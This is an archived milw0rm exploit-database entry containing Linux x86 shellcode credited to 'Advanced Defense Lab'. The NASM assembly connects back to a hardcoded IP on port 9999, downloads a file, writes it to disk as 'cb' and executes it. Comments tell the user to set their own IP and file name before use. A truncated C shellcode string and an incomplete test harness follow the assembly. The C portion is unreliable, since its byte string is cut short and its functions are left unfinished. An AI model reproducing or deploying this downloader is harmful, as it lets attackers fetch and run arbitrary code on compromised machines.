;file download shellcode (149 bytes)
;connect back, download a file and execute.
;modify the name of the file and the ip address first.
;Advanced Defense Lab(ADL)
global _start
xor ecx,ecx
mul ecx
xor ebx,ebx
push eax
push byte 0x1
push byte 0x2
mov ecx,esp
inc ebx
mov al,0x66
int 0x80
mov edi,eax ;edi=sockfd
;connect,port(9999)=270f ip(
push edx
push long 0x2335738c ;address *
push word 0x0f27 ;port *
mov dl,0x02
push dx ;family 1
mov ecx,esp ;adjust struct
push byte 0x10
push ecx
push edi ;sockfd
mov ecx,esp
mov bl,3
mov al,102
int 0x80
xor ebx,ebx
xor ecx,ecx
push ecx
push word 0x6263 ;file name="cb"
mov ebx,esp
mov cx,0x242
mov dx,0x1c0 ;Octal
mov al,5
int 0x80
mov esi,eax ;esi=fd
xor ecx,ecx
mul ecx
mov dx,0x03e8 ;memory chunk=1000=0x03e8: read per time
;sys_read(socket sockfd,buf,len)
xor ebx,ebx
xor eax,eax
mov al,3
mov ebx,edi ;edi=sock fd
lea ecx,[esp-1000] ;memory chunk
int 0x80
mov ebx,esi
mov edx,eax
xor eax,eax
mov al,4
int 0x80
cmp dx,0x03e8
je L1 ;loop
mov ebx,esi
xor eax,eax
mov al,6
int 0x80
xor ecx,ecx
mul ecx
push ecx
push word 0x6263 ;file name="cb"
mov ebx,esp
push ecx
push ebx
mov ecx,esp
mov al,0x0b
int 0x80
xor eax,eax
xor ebx,ebx
inc eax
int 0x80
unsigned char shellcode[]="\x31\xc9\xf7\xe1\x31\xdb\x99\x50\x6a\x01\x6a\x02\x89\xe1\x43\xb0\x66\xcd\x80"
void k(){
int *ret;
ret=(int *)&ret+2;
int main (){
return 0;
// milw0rm.com [2008-08-25]